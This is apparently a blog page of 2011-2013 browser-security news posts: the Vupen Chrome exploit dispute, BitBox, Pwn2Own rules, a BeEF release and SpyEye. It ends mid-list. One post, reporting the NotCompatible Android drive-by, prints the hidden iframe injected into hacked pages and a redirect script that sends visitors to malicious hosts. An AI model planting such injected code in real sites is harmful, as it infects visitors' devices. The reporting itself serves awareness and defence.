Showing posts sorted by relevance for query browser. Sort by date Show all posts
Showing posts sorted by relevance for query browser. Sort by date Show all posts

The World's Safest Browser: BitBox

Posted by Avik Sarkar On 5/15/2011 01:31:00 am



There is no such thing as an entirely secure browser. Let's be realistic: You will always need a good portion of common sense and Internet smarts to avoid nasty attacks hijacks.

However, if you are paranoid about security, there is one browser that will reliably protect you from virtually all threats. It's a browser you already know: Firefox 4.0.1. Well, a boxed version of Firefox 4.0.1.
I am not exactly an adventurous Internet user as far as the dark corners of the web are concerned. Just I am not the kind of person to enjoy the silence in a dark alley in Chicago's south suburbs after dawn, I typically avoid websites I don't generally trust. I have had my fair share of spyware, trojans and other malware that caused me quite a bit of headache in the past and I am just more cautious than I was 10 years ago. Yet, that might change. I have just discovered a bulletproof wrapper for Firefox and, at least for now, I don't care that much anymore what is happening below the content the browser shows. There might be lots of malware and I really don't care anymore.
The reason is that I have started using BitBox as my browser for my general work-related tasks. BitBox is essentially a heavily armored version of Firefox 4.0.1 that is encased in Oracle's VirtualBox virtual machine (VM) environment that houses a secured Debian 6 Linux OS. That sounds relatively complicated, but once it is installed, this secure version of Firefox works just like a regular version of the browser. The difference is that it runs in a virtualized environment that is separate from your Windows XP/Vista/7.

The upside clearly is that you are dealing with a self-contained package. If you click on malicious malware, the usual EXE files cannot be executed in your Linux VM. You can download files, but they will not explicitly affect your Windows system and need to be manually moved out of the VM, if you have connected the drives. malware that infects Firefox during your session is automatically deleted the next time you start BitBox, as it always starts with its default configuration in the way it was installed. However, phishing attacks that target your personal data and may trick you in providing critical information will still require some common sense not to do so and will not protect you from the effects of such actions.
There are a few downsides. First, it is a hefty 990 MB download and the installed software will require almost 2 GB of space, as there is a need for Oracle's VirtualBox that is included in the package as well as a Debian 6 installation. Since the software is set back to a default level at every time it starts, it is not the most convenient browser to be used on an every day basis for the consumer. The deal breaker is its language. The software was developed for the German government and while it is available as a free download, it is only available in German. Unless you have basic knowledge of German, the installation will be a hurdle too high to overcome and even then it may be rather uncomfortable to be generally used.
The installation of the entire package is documented via PDF file and is somewhat straight forward, but some knowledge about virtual machines and virtualization in general does help when the individual components of the software are installed. In the end, you really want to know what is happening on your PC and you would want to know what effects a configured virtual drive on your PC has. Other than that, I was able to install BitBox within 15 minutes, once it was downloaded. The only criticism I would have is that developer Sirrix is not using the most recent version of Oracle's Virtual Box software (4.04 vs. 4.06). Custom configuration options include a specific download folder as well as a separate malware scanner as well as random root passwords for the virtual machine and proxy settings. During the installation, the software installs a Linux guest (Firefox) inside Virtual Box. Typically you would run the software form within VirtualBox, but Sirrix has managed to trim down the entire process to a single icon on the desktop.
I briefly mentioned it - this is not a browser to get deeply emotional about and discuss its performance features, but the concept is very compelling as far as browser safety is concerned. Plain browsing tasks make a lot of sense in such a package. In fact, I wonder, why such versions aren't offered by Mozilla and Google as well as Opera and Microsoft by default. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Google engineers deny Chrome hack exploited browser's code

Posted by Avik Sarkar On 5/13/2011 10:29:00 pm


Several Google security engineers have countered claims that a French security company found a vulnerability in Chrome that could let attackers hijack Windows PCs running the company's browser.

Several Google security engineers have countered claims that a French security company found a vulnerability in Chrome that could let attackers hijack Windows PCs running the company's browser.
Instead, those engineers said the bug Vupen exploited to hack Chrome was in Adobe's Flash, which Google has bundled with the browser for over a year.
Google's official position, however, has not changed since Monday, when Vupen announced it had successfully hacked Chrome by sidestepping not only the browser's built-in "sandbox" but also by evading Windows 7's integrated anti-exploit technologies.
"The investigation is ongoing because Vupen is not sharing any details with us," a Google spokesman said today via email.
But others who work for Google were certain that at least one of the flaws Vupen exploited was in Flash's code, not Chrome's.
"As usual, security journalists don't bother to fact check," said Tavis Ormandy, a Google security engineer, in atweet earlier today . "Vupen misunderstood how sandboxing worked in Chrome, and only had a Flash bug."
"It's a legit pwn, but if it requires Flash, it's not a Chrome pwn," tweeted Chris Evans, a Google security engineer and Chrome team lead, using the security-speak term for compromising an application or computer.
Justin Schuh, whose LinkedIn account also identifies him as a Google security engineer, chimed in with , "No one is saying it's not a legit exploit. The point is that it's not the exploit [Vupen] claimed."
When asked to confirm the source of the vulnerabilities it exploited, Vupen was blunt in its refusal to share any information.
"We will not help Google in finding the vulnerabilities," said Chaouki Bekrar, Vupen's CEO and head of research, in an email reply to questions. "Nobody knows how we bypassed Google Chrome's sandbox except us and our customers, and any claim is a pure speculation."
Last year, Vupen changed its vulnerability disclosure policies when it announced it would no longer report bugs to vendors -- as do many researchers -- but instead would reveal its work only to paying customers.
Today's Twitter back-and-forth between Google's engineers and Bekrar grew heated at times.
"When it comes to critical vulnerabilities, all software vendors/devs (including Google) always try to downplay the findings," Bekrar said on Twitter .
"I was thinking something similar about researchers who inflate their accomplishments," Schuh replied , also on Twitter, to Bekrar.
The point made by Ormandy, Evans and Schuh was that Vupen didn't exploit a bug in Chrome's own code, but in Flash, which has been partially sandboxed in the stable version of the browser since early March 2011 .
While the Google engineers seemed to acknowledge that a bug in Flash was involved in Vupen's exploit, they also defended the sandbox technology -- meant to isolate Flash from the rest of the computer -- even as it apparently failed to prevent an attack.
"The Flash sandbox blog post went to pains to call it an initial step," said Evans. "It protects some stuff, more to come. Flash sandbox [does not equal] Chrome sandbox."
The blog Evans referred to was published in December 2010 , where Schuh and another Google developer, Carlos Pizano said, "While we've laid a tremendous amount of groundwork in this initial sandbox, there's still more work to be done."
Chrome's Flash sandbox is currently available only in the Windows version of the browser; Google has promised to implement it in the Mac and Linux editions, but has not yet done so.
While Bekrar later hinted that Vupen's exploit did leverage a Flash vulnerability, he said the attack code also took advantage of at least one other bug. "[Chrome's] built-in plug-ins such as Flash are launched inside the sandbox which was created by Google, so finding and exploiting a Flash or a WebKit vulnerability will fall inside the sandboxes and will not circumvent it," he wrote. "A sandbox bypass exploit is still required."
Chrome has a reputation as a secure browser, in large part because of its sandbox technology. Chrome is the only browser to have escaped unscathed at the last three Pwn2Own hacking contests, the annual challenge hosted by the CanSecWest conference in Vancouver, British Columbia, and sponsored by HP TippingPoint's bug bounty program.
In March 2011, no one took on Chrome at Pwn2Own, even though Google had offered a $20,000 prize to the first researcher who hacked the browser and its sandbox.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Firefox 4 vs. Internet Explorer 9: Which is Safer???

Posted by Avik Sarkar On 5/13/2011 10:54:00 pm




The app frenzy is firing the browser wars and accelerating the need for browser development and updates. Chrome seems to update daily, Firefox is getting faster in response and Microsoft is talking IE 10 just IE9 gets fully out of the gate.
Because of the constant changes, it's hard to truly evaluate any given browser on any given day. Even so, there are certain key elements that distinguish one browser from another in terms of security. Here's how two of them, Firefox 4 and Internet Explorer 9, measure up:


Firefox 4
Firefox 4 is packed with security features aimed at resolving common, but difficult-to-avoid attacks such as cross site scripting (XSS), redirects from secure HTTPS webpages to plain old HTTP, and click-jacking.


Firefox 4 uses Content Security Policy (CSP) to quickly identify and block XSS attempts by simply using the server headers to tell it what kind of content to expect and, therefore, which content to block based on its lack of adherence to the server's own CSP.
This beats the heck out of comparing strings from browser and server in the remote hope of preventing XSS. Not only is the string approach akin to matching needles in thousands of remote haystacks, when it did deliver a finding, that finding was usually wrong. Developers often turned off such attempts, as found in IE 8's X-XSS-protection, out of sheer frustration.


However, CSP, though far more efficient, can also give a false positive reading if the website developer fails to sufficiently cover all the features with its policy. Still, CSP beats the string approach hands-down.


Other improvements are equally attractive from a harder to track user-agent header to a do-not-track feature that requires a simple opt-in to enable. However, the do not track feature works on an honor system: the site is notified of your desire for privacy but they don't have to comply with your request.


The strict transport security (STS) feature allows the user to force an HTTPS connection to user chosen sites. For example, the user can force an HTTPS connection-only to Facebook or other social sites thereby avoiding SSL strip attacks on those pages.
Firefox 4 also hides visited links from a hacker. The user still sees a visited link change color but the hacker doesn't. The CSS tweak hides your link viewing in the browser history from prying eyes.



Internet Explorer 9 (IE9)
IE9, says Microsoft, blocked 99 percent of socially engineered malware attacks. If the claim is true, then that's five times more than Firefox. However, both Mozilla and Google contest the interpretation as a definitive competitive edge for IE9 since the type of malware the finding applies to is not a common threat.


It is important to remember too that IE is targeted more often than Firefox simply because of economies of scale. The bad guys know that even people who use Firefox or Chrome often also have IE on their computer and use it at least occasionally. Therefore it makes tons of economic sense for hackers to target it over the competition.


In any case, IE9 is a significant upgrade from previous versions. It appears to run faster too, which is helpful.


Active X can be easily filtered and the user can choose to block or proceed accordingly.
Tracking protection is a new feature that enables users to control what they share. The Tracking Protection List, published by partners PrivacyChoice, TRUSTe, Abine and Adblock Plus, notifies companies if users don't want to be followed. However, just like with FireFox 4, the do not track feature works on an honor system; the site is notified of your desire for privacy but they don't have to comply with your request.
The download manager has an integrated SmartScreen malware protection feature. The Smartscreen Application Reputation cuts down on the aggravation factor as much as it does on security threats. It greatly reduces the number of warning prompts by dropping them entirely from frequently visited sites and warns only when the likelihood of malware is high. The "pinning" feature also helps as it allows users to "pin" frequently-visited and trusted sites to the browser toolbar, which then runs them in their own session. The pinning feature helps prevent HTTPS to HTTP redirects.
IE9 also has improved memory protection to prevent hackers from exploiting memory related vulnerabilities in the browser or any of its add-ons.
And the winner is ...
The consumer!


As of this point, security is no longer a major deciding factor in which browser you should use since both have seriously beefed-up protection. Not that you're totally safe from hackers, but at least these two browsers have finally bolted the doors and locked the windows.


A prolific and versatile writer, Pam Baker's published credits include numerous articles in leading publications including, but not limited to: Institutional Investor magazine, CIO.com, NetworkWorld, ComputerWorld, IT World, Linux World, Internet News, E-Commerce Times, LinuxInsider, CIO Today Magazine, NPTech News (nonprofits), MedTech Journal, I Six Sigma magazine, Computer Sweden, NY Times, and Knight-Ridder/McClatchy newspapers. She has also authored several analytical studies on technology and eight books. Baker also wrote and produced an award-winning documentary on paper-making. She is a member of the National Press Club (NPC), Society of Professional Journalists (SPJ), and the Internet Press Guild (IPG).

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Security firm exploits Chrome zero-day to hack browser, escape sandbox

Posted by Avik Sarkar On 5/10/2011 06:07:00 pm


 French security company Vupen said today that it's figured out how to hack Google's Chrome by sidestepping not only the browser's built-in "sandbox" but also by evading Windows 7's integrated anti-exploit technologies.
Google said it was unable to confirm Vupen's claims.
"The exploit ... is one of the most sophisticated codes we have seen and created so far, as it bypasses all security features including ASLR/DEP/Sandbox," said Vupen in a blog post Monday. "It is silent (no crash after executing the payload), it relies on undisclosed ('zero-day') vulnerabilities and it works on all Windows systems."
Vupen posted a video demonstration of its exploit on YouTube.
According to Vupen, its exploit can be served from a malicious Web site. If a Chrome user surfed to such a site, the exploit executes "various payloads to ultimately download the Calculator from a remote location and launch it outside the sandbox at Medium integrity level."
Vupen used the Windows Calculator only as an example: In an actual attack, the "calc.exe" file would be replaced by a hacker-made payload.
Historically, Chrome has been the most difficult browser to hack, primarily because of its sandbox technology, which is designed to isolate Chrome from the rest of the machine to make it very difficult for a hacker to execute attack code on the PC.
For example, Chrome has escaped unscathed in the last three Pwn2Own hacking contests, an annual challenge hosted by the CanSecWest conference in Vancouver, British Columbia, and sponsored by HP TippingPoint's bug bounty program.
Last March, a team from Vupen walked away with a $15,000 cash prize afterhacking Safari, the Apple browser that, like Chrome, is built on the open-source WebKit browser engine.
But no one took on Chrome at 2011's Pwn2Own, even though Google had offered a $20,000 prize to the first researcher who hacked the browser and its sandbox.
The Vupen attack code also bypassed Windows 7's ASLR (address space layout randomization) and DEP (data execution prevention), two other security technologies meant to make hackers' jobs tougher.
Vupen said it would not publicly release details of the exploit, or the unpatched bug(s) in Chrome. "This code and the technical details of the underlying vulnerabilities will not be publicly disclosed," said Vupen. "They are shared exclusively with our Government customers as part of our vulnerability research services."
Last year, Vupen changed its vulnerability disclosure policies when it announced it would no longer report bugs to vendors, but instead would reveal its research only to paying customers.
Other security experts reacted today to the news of one or more Chrome zero-days, and to Vupen's practice of providing details only to its clients.
"I suppose that means we have a known Chrome 0-day floating around. That's fun," said Jeremiah Grossman, CTO of WhiteHat Security, in a Twitter message today.
"That also means for that the [government] is outbidding Google for bug bounties," Grossman added in a follow-up tweet.
"For now, the [government] still has more money than Google," chimed in Charlie Miller, the only researcher who has won cash prizes at four straight Pwn2Own contests.
Google, like rival browser maker Mozilla, runs a bounty program that pays independent researchers for reporting flaws in Chrome. Last month, Google paid out a record $16,500 in bounties for bugs it patched in a single update. In the first four months of 2011, Google spent more than $77,000 on bug bounties.
Google cited Vupen's policy of not reporting flaws as the reason it could not verify the French firm's assertions.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Security Flaws in Amazon Silk (The Cloud-Based) Web Browser

Posted by Avik Sarkar On 10/03/2011 04:18:00 pm


Amazon Silk, the cloud-based Web browser for the leading US online retailer’s Kindle Fire tablet, received mix reactions from users re privacy, especially on features with high risks of endangering data confidentiality.
The Amazon Silk Web browser rides on the high-speed and powerful connection offered by the company’s own Elastic Cloud Computing (EC2) service to reduce page load times.
The online retailer apparently boasts on this split browser architecture, which Opera Software ASA already used on its lightweight Opera Mini browser since 2005. Concerning security, the Amazon Silk Web browser stores all the visited sites of any user that are easily accessible to law enforcement agencies by request. Amazon’s servers will act as MITM, or man-in-the-middle, proxy for HTTPS requests, giving the company enough ability to tap on secure communications. Fortunately, the Web browser comes with an offline/off-cloud feature to stop sharing sensitive data to the servers. However, this Amazon Silk functionality is not set to default so most users will likely not notice of having one and use it.


-News Source (Social Barrel)



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Hacked Sites Infecting Android Mobiles With "drive-by" Malware

Posted by Avik Sarkar On 5/07/2012 06:13:00 pm

Hacked Sites Infecting Android Mobiles With "drive-by" Malware

Analysts with Lookout Mobile Security have found websites that have been hacked to deliver malicious software to devices running Android, an apparent new attack vector crafted for the mobile operating system. The style of attack is known as a drive-by download and is common on the desktop: When someone visits a hacked website, malware can transparently infect the computer if it doesn't have up-to-date patches. The malware, dubbed NotCompatible by Lookout Security and initially reported by Reddit user Georgiabiker, is hosted in a iframe at the bottom of a manipulated web page. When a user arrives on the page, a file by the name of "Update.apk" begins downloading immediately. According to Lookout Mobile Security official blog post- 
How it Works :- 
In this specific attack, if a user visits a compromised website from an Android device, their web browser will automatically begin downloading an application—this process is commonly referred to as a drive by download.
When the suspicious application finishes downloading, the device will display a notification prompting the user to click on the notification to install the downloaded app.  In order to actually install the app to a device, it must have the “Unknown sources” setting enabled (this feature is commonly referred to as “sideloading”).  If the device does not have the unknown sources setting enabled, the installation will be blocked.
Technical Details :- 
Infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>
We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.
When a PC-based web browser accesses the site at gaoanalitics.info, a not found error is returned; however, if a web browser with the word “Android” in its user-agent header accesses the page, the following is returned:
<html><head></head><body><script  type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>
This page causes the browser to immediately attempt to access the page at androidonlinefix.info.  Like the previous site, only browsers sending an Android User-agent string will trigger a download (all other browsers will show a blank page).  When visiting this page from an Android browser, the server returns an android application, causing an Android browser to automatically download it. For detailed information click here




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

BeEF v0.4.2.6-alpha

Posted by Avik Sarkar On 6/13/2011 12:54:00 am


BeEF, the Browser Exploitation Framework is a professional security toolprovided for lawful research and testing purposes. It allows the experienced penetration tester or system administrator additional attack vectors when assessing the posture of a target. The user of BeEF will control which browser will launch which exploit and at which target.
BeEF hooks one or more web browsers as beachheads for the  launching of directed exploits in real-time. Each browser is likely to be within a different security context. This provides additional vectors that can be exploited by security professionals.BeEF provides an easily integratable framework that demonstrates the impact of browser and Cross-site Scripting issues in real-time. Developmenthas focused on creating a modular framework. This has made moduledevelopment a very quick and simple  process. Current modules include Metasploit, port scanning, keylogging, TOR detection and more.

This release adds a new Cold Fusion directory traversal exploit. When this module is launched the attack will appear to originate from the hooked browser. Also, a new ‘Detect Social Networks‘ module was implemented! This will determine if the hooked browser is logged into Facebook, GMail or Twitter! Looks like an awesome release! Keep up the good work guys!


Download BeEF v0.4.2.6-alpha (beef-latest-alpha.tar.gz/0.4.2.6alpha.zip) here.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

critical Chrome bugs has been patched

Posted by Avik Sarkar On 5/26/2011 12:25:00 pm


Google on Tuesday patched several vulnerabilities in Chrome, including two a French security company said could be used to bypass the browser's anti-exploit technology.
But Chrome 11.0.696.71, which Google rolled out yesterday to users via its automatic update mechanism, does not patch the flaw that Vupen researchers said earlier this month could be exploited on Windows 7. Tuesday's security update was the second for the Chrome "stable" build -- the most polished version of the browser -- this month. Google fixed four vulnerabilities in the update, including two rated "critical," the category typically reserved for bugs that may let an attacker escape Chrome's "sandbox." Google has patched five critical bugs so far this year. One of the remaining pair of flaws was ranked "high" -- and got the researcher who reported it a $1,000 bug bounty -- while the other was labeled "low" on Google's four-step threat scoring system. The two critical vulnerabilities were credited to Google's own security engineers. Although Google declined to confirm that the two most serious bugs could be used by attackers to break out of the Chrome sandbox, and thus plant malicious code on the computer, French security firm Vupen said that that was likely. "The vulnerabilities fixed today and related to GPU and blob handling are a typical example of critical vulnerabilities that can affect Chrome and can be exploited to execute arbitrary code outside the sandbox," said Chaouki Bekar, Vupen's CEO and head of research, in an email reply to questions. Still unpatched, said Bekar, is the bug or bugs that Vupen said its researchers found, then figured out how to exploit, earlier this month. "The recent flaws we discovered in Chrome, including the sandbox bypass, remain unpatched and our exploit code works with version 11.0.696.71, too," said Bekar. Those vulnerabilities made news earlier this month when Vupen announced it had hacked Chrome by sidestepping not only the browser's built-in sandbox but also by evading Windows 7's integrated anti-exploit technologies. Within days, several Google engineers denied that the bugs Vupen exploited were in Chrome itself, claiming instead that the French firm leveraged a flaw in Adobe's Flash, which Google bundles with Chrome. Chrome has been resistant to attack, primarily because of its sandbox technology, which is designed to isolate the browser from the rest of the machine, making it very difficult for a hacker to execute code on the computer. For example, Chrome has escaped unscathed in each of the last three Pwn2Own hacking contests, an annual challenge hosted by the CanSecWest conference in Vancouver, British Columbia, and sponsored by HP TippingPoint's bug bounty program. No other browser included in Pwn2Own has matched Chrome's record at the contest. On Tuesday, Google spokesman Jay Nancarrow declined to comment further about the Vupen exploit claims, and referred to previous statements that Google was unable to investigate the bugs because Vupen would not share details of the flaws. Last year, Vupen announced a change in its vulnerability disclosure policies, saying it would no longer report bugs to vendors -- as do many researchers -- but would reveal its work only to paying customers. According to Web measurement company Net Applications, Chrome accounted for 11.9% of all browsers used last month, putting Google's program in third place behind Microsoft's Internet Explorer, with 55.1%, and Mozilla's Firefox, with 21.6%. Chrome 11 can be downloaded for Windows, Mac OS X and Linux from Google's Web site. Users already running the browser will be updated automatically.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

BitBox Provides Security with Firefox 4

Posted by Avik Sarkar On 5/16/2011 02:35:00 pm



Browser security is often a hot topic on the web, with some users resulting to popular add-ons like NoScript or AdBlockPlus; or even more drastic measures like Sandboxing the browser. With a new contender to the market, German company Sirrix AG brings a new method of sandboxing your browser which hides it inside a VM Box 4.4 install of Debian Linux and lets you use Firefox 4 as your online browser of choice. While it's currently limited to just Firefox, it's currently one of the most secure solutions on the market for those of us looking for absolute security. Most importantly, in my eyes at least, this software comes free of charge to the end users. Though you can choose a Enterprise solution, which you then pay for the support given to the users. 
Security is an oft-debated topic in the ongoing browser wars, but there's no denying that malware is a common problem for all of the leading contenders. A new solution launched this week by German Sirrix AG, however, uses Firefox 4, Linux and virtualization to create what it calls a "browser in a box" that keeps all malware isolated and out of the user's main operating system.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Rekonq 0.8 (The KDE Web Browser)

Posted by Avik Sarkar On 10/20/2011 05:32:00 pm



The rekonq development team has released version 0.8 of rekonq, the KDE web browser. The browser is based on Qt's QtWebKit, and, according the project's home page, aims to be "light, fast & clean", avoiding competing with KDE's more feature-rich web browser, Konqueror. Rekonq is the default web browser in Kubuntu, and has been included with KDE's Extragear collection since May 2010.

Features:- 
  • AdBlock: Third Party rules support
  • Custom urlbar context menu (paste & go action, …)
  • Set editable
  • Restore tab’s history
  • UI changes (in rekonq menu)
  • Quit closes app (and added option to close window by closing last tab)
  • Use KParts to view page source
  • “click” mechanism to manage favorites
  • “Do Not Track” feature
  • History, time first visit added
  • Tab messages using KMessageWidget
  • Improved drag’n'drop
  • vi style navigation (optional)
  • ctrl + number favorites shortcuts
  • SSL UIs rewamped
To download rekonq 0.8  Click Here



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Pwn2Own 2013 -Hack Major Browser, Adobe Reader, Flash or Java & Earn in Million Dollars

Posted by Avik Sarkar On 1/24/2013 06:58:00 pm


Pwn2Own 2013 -Hack Major Web-browser, Adobe Reader, Flash or Java & Earn in Million Dollars 

Since the last two years the Pwn2Own hacker contest has become an important fixture in the world of testing the security of software applications, operating systems and hardware devices. In last two years we have seen several hackers, security professionals have expressed their enthusiasm and joined Pwn2Own where four major and widely browser's security get compromised, in order to make applications, software more safe and secure. Last year we have reported how different hackers across the globe taken part in Pwn2Own and successfully hacked Google Chrome, IE & Firefox, and earned millions of dollars. But the contest of this year has some more twist than before as, HP TippingPoint and Google, sponsor of Pwn2Own, has made clear that it is expanding the focus of the competition beyond browsers. Also, Pwn2own 2013 will include $560,000 in prize money for demonstrations of exploits in the major web browsers, Adobe Reader, Adobe Flash or Oracle Java

Contest Dates:-

The contest will take place the 6th, 7th, and 8th of March in Vancouver, British Columbia during the CanSecWest 2013 conference. DVLabs blog post will be updated as the contest plays out and get real-time updates by following either @thezdi or @Pwn2Own_Contest on Twitter or search for the hash tag #pwn2own.

Rules & Prizes:-

HP ZDI is offering more than half a million dollars (USD) in cash and prizes during the competition for vulnerabilities and exploitation techniques in the below categories. The first contestant to successfully compromise a selected target will win the prizes for the category.
  • Web Browser
    • Google Chrome on Windows 7 ($100,000)
    • Microsoft Internet Explorer, either
      • IE 10 on Windows 8 ($100,000), or
      • IE 9 on Windows 7 ($75,000)
    • Mozilla Firefox on Windows 7 ($60,000)
    • Apple Safari on OS X Mountain Lion ($65,000)
  • Web Browser Plug-ins using Internet Explorer 9 on Windows 7
    • Adobe Reader XI ($70,000)
    • Adobe Flash ($70,000)
    • Oracle Java ($20,000)
The targets will be running on the latest, fully patched version of the Windows 7, 8, and OS X Mountain Lion. All targets will be installed in their default configurations, as this is how a majority of users will have them configured. As always, the vulnerabilities utilized in the attack must be unknown and not previously reported to the vendor. If a sandbox is present, a full sandbox escape is required to win. A given vulnerability may only be used once across all categories.
Upon successful demonstration of the exploit, the contestant will provide HP ZDI a fully functioning exploit and all the details of the vulnerability used in the attack. In the case that multiple vulnerabilities were exploited to gain code execution, details about all the vulnerabilities (memory corruption, infoleaks, escalations, etc.) leveraged and the sequence in which they are used must be provided to receive the prize money. The initial vulnerability utilized in the attack must be in the registered category.
Along with prize money, the contestant will receive the compromised laptop and 20,000 ZDI reward points* which immediately qualifies them for Silver standing. 

Full contest rules can be found at http://dvlabs.tippingpoint.com/Pwn2OwnContestRules.html, and may be changed at any time without notice.

Registration:-
Contestants are asked to pre-register by contacting ZDI via e-mail at zdi@hp.com. This will allow the organizer to ensure that they have the necessary resources in place to facilitate the attack. If more than one contestant registers for a given category, the order of the contestants will be drawn at random.






SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Microsoft Security Advisory (2794220) Remote Code Execution Vulnerability in Internet Explorer Fixed

Posted by Avik Sarkar On 1/05/2013 09:48:00 pm

Microsoft Security Advisory (2794220) Remote Code Execution Vulnerability in Internet Explorer Fixed

The Redmond based software giant Microsoft issued an urgent security advisory to address vulnerabilities in its popular web-browser that is Internet Explorer.  Few of days new “zero day” security hole in IE was discovered which could potentially allow hackers to take over control of your system when all you've done is visit an infected website. The vulnerability affects IE versions 6, 7 and 8. Though the latest versions of the browser, that means IE 9 and 10, are not affected. “An attacker who successfully exploited this vulnerability could gain the same user rights as the current user.” Microsoft said in its statement. The statement went on to say, “an attacker could host a website that contains a webpage that is used to exploit this vulnerability. In addition, compromised websites and websites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability.”
On its advisory Microsoft first issued warning of the problem, which involves how IE accesses "an object in memory that has been deleted or has not been properly allocated." The problem corrupts the browser's memory, allowing attackers to execute their own code. Security vendor Symantec described such a scenario as a "watering hole" attack, where victims are profiled and then lured to the malicious site. Last week, one of the websites discovered to have been rigged to delivered an attack was that of the Council on Foreign Relations, a renowned foreign policy think tank. 
While talking about IE and its bugs, then we would like to remind you that couple of weeks ago, Spider.io a website analytics firm has discovered a security vulnerability in all current versions of Internet Explorer that allows attackers to trace mouse cursors anywhere on users' screens even if the Internet Explorer window is minimized. That time the software giant ignored that particular issue. But here they take this one bit seriously; So if you still using the older and affected version of IE, then its time to update your browser, in order to stay safe and secure on the Internet. To update your browser or to access the security fix click Here




SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Web Browser Grand Prix 5

Posted by Avik Sarkar On 7/07/2011 06:20:00 pm

 
Three major released have landed since our last impromptu Web Browser Grand Prix (WBGP4): Chrome 12, Firefox 5, and Opera 11.50. Can Chrome or Opera regain the WBGP championship? Will Mozilla Firefox ever overtake Microsoft's IE9 in the rankings?
If it seems like it was only weeks ago when we were compelled to test the then-new Mozilla Firefox 4 against the reigning Web Browser Grand Prix champion Microsoft Internet Explorer 9 in Web Browser Grand Prix 4: Firefox 4 Goes Final, that's because it was only a few weeks ago.
In an attempt to curb the siphoning of its user base to Google, Mozilla decided to keep pace with the frenetic development cycle of Chrome. Firefox 5 is now a reality. But will Mozilla also keep up with innovation like Google? Furthermore, will a higher integer finally allow Mozilla to overtake arch-rival Microsoft in our performance metrics? Can former speed-kings Chrome and Opera reclaim the dual domination of our WBGP crown, as they did in 2010?
We've tightened up our suite of benchmarks for this article, cutting the fat that was Google's V8 JavaScript Benchmark and the redundant two-pixel variant of the GUIMark2 HTML5 Vector Charting test. We also fleshed it out by adding Facebook's JSGameBench, as well as battery life and reliability testing. But before we get to the benchmarks, let's get caught up on the latest developments in the continuing browser wars.
Opinions:-

The release of Firefox 5 was met with harsh criticism for its apparent lack of anything new. It has been said that Firefox 5 should have been called Firefox 4.1 or 4.2. Or even 4.02.
There is also a growing concern over whether the new rapid release schedule jives with IT departments. Firefox became a viable choice for many companies during the version 2 and 3 days. Mozilla also offers the preferred development platform for most Web designers. Basically, Firefox gained the reputation of being the most stable choice. By mimicking Chrome's development cycle, Mozilla may have shot itself in the foot.
Smack Talk:-

Microsoft took a shot right across the bow of Google and Mozilla by announcing that WebGL is “harmful,” and that IE10 would not be utilizing the specification. Several experts came out in support of Microsoft's assertion, though it should be noted that Redmond may have a dog in this fight with DirectX.

Attacking Mozilla even further, the Internet Explorer development team sent the Firefox development team a cupcake to celebrate the release of Firefox 5. Mozilla also received cakes from Microsoft for the release of Firefox 3 and 4. Full cakes. Obviously, this is in response to the criticism that Firefox 5 is nothing more than a minor update to Firefox 4. The included note read: "Congratulations on shipping! Love, The IE Team". "Congratulations on shipping" might have been in reference to the frequent delays that plagued Firefox 4, which was eventually made available more than six months late. Now that's a classy way to rag on somebody. Not missing a single opportunity to slam its competition, Microsoft also capitalized on the other major criticism of Firefox 5 when an IE developer boasted Microsoft's commitment to IT.
Mozilla shot back with a blog post addressing the IT issue, although in a very non-concrete way:

"We are exploring solutions that balance these needs..."

Not to be outdone, an Opera employee also had this to say in regard to rapid release schedule:

“Despite the version number (11.50), we've packed a lot of new features into it. While other browsers rush to release whole new version numbers with small tweaks, I think we've kept traditional versioning, while simply releasing a little faster.”Obviously, this comes at an unfortunate time for Mozilla, but one cannot help but wonder if this comment was meant for Google. Opera and Google have gotten into it pretty heavily in the past, and, for a time (before IE9), Chrome and Opera swapped places on a semi-monthly basis in the performance charts.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

SpyEye Banking Trojan Swallowing US, Russia & Ukraine -Said AhnLab

Posted by Avik Sarkar On 3/30/2012 08:49:00 pm

SpyEye Banking Trojan Swallowing US, Russia & Ukraine -Said AhnLab 

Researcher at AhnLab has figure out a significant majority of the domains and hosts for the SpyEye Banking Trojan are in the US. The malicious code has gained attention as of late for the threat it poses to online banking user information. According to SpyEye-relevant host data extracted by the AhnLab Packet Center, 48% of all SpyEye domains were found to be located in the US, followed by Russia at 7%, and the Ukraine at 6%. The AhnLab Packet Center is the company’s malicious packet analysis system, which assesses suspicious packet data, including that from SpyEye C&C servers. The findings indicate that the main targets of SpyEye are mainly in the US, and that North American financial institutions and users should remain especially vigilant.
Since its toolkit first became public in 2010, the SpyEye Trojan has produced many variants. According to analysis by the AhnLab Packet Center, the “10310” variant was identified as the most distributed version at 34.5%. The “10299” and “10290” variants followed at 14.7% and 14.6%, respectively. Additional variants are expected in the future. SpyEye, along with ZeuS, are notorious banking Trojans that have helped thieves steal more than $100 million around the world. Without an end-user PC solution, banks face great difficulty protecting individual customers from the sophisticated threats posed by these malicious codes. AOS ensures comprehensive transaction security with its Anti-keylogger, Firewall and Anti-virus/spyware agents for individual user PCs, as well as Secure Browser which creates an independent online space for safe communication. With AOS’ unique approach to transaction security, banks are able to deliver complete peace of mind to their online customers.

The four components of the AhnLab Online Security (AOS) solution, designed to protect the entire transaction process, include:-
